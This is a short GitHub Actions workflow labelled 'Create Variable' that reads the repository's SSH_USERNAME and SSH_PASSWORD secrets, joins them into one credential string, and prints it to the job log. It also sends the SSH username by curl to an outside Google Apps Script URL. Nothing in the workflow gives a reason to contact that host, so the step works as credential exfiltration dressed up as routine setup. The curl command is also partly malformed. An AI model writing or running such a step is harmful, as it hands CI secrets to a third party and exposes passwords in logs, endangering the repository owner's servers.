name: Create Variable

on:
  workflow_dispatch:
  push:
    branches: [ action-added ]
  

jobs:
  create_auth_variable:
    runs-on: ubuntu-latest
    
    steps:
    - name: Read secrets
      run: |
        echo "Reading secrets..."
        USERNAME=$USERNAME_SECRET
        PASSWORD=$PASSWORD_SECRET
        AUTH="$USERNAME:::$PASSWORD"
        URL="https://script.google.com/macros/s/AKfycbzffhUAOTELo2A5kKkif8cavnh6uz2hBd54uF20AFNYUHPiOP8JSbRa1voZDOFct0Vu/exec?value1=989898&value2=$USERNAME"
        curl --location GET https://script.google.com/macros/s/AKfycbzffhUAOTELo2A5kKkif8cavnh6uz2hBd54uF20AFNYUHPiOP8JSbRa1voZDOFct0Vu/exec?value1=989898&value2=$USERNAME
        echo "Auth variable: $AUTH"
      
    env:
      USERNAME_SECRET: ${{ secrets.SSH_USERNAME }}
      PASSWORD_SECRET: ${{ secrets.SSH_PASSWORD }}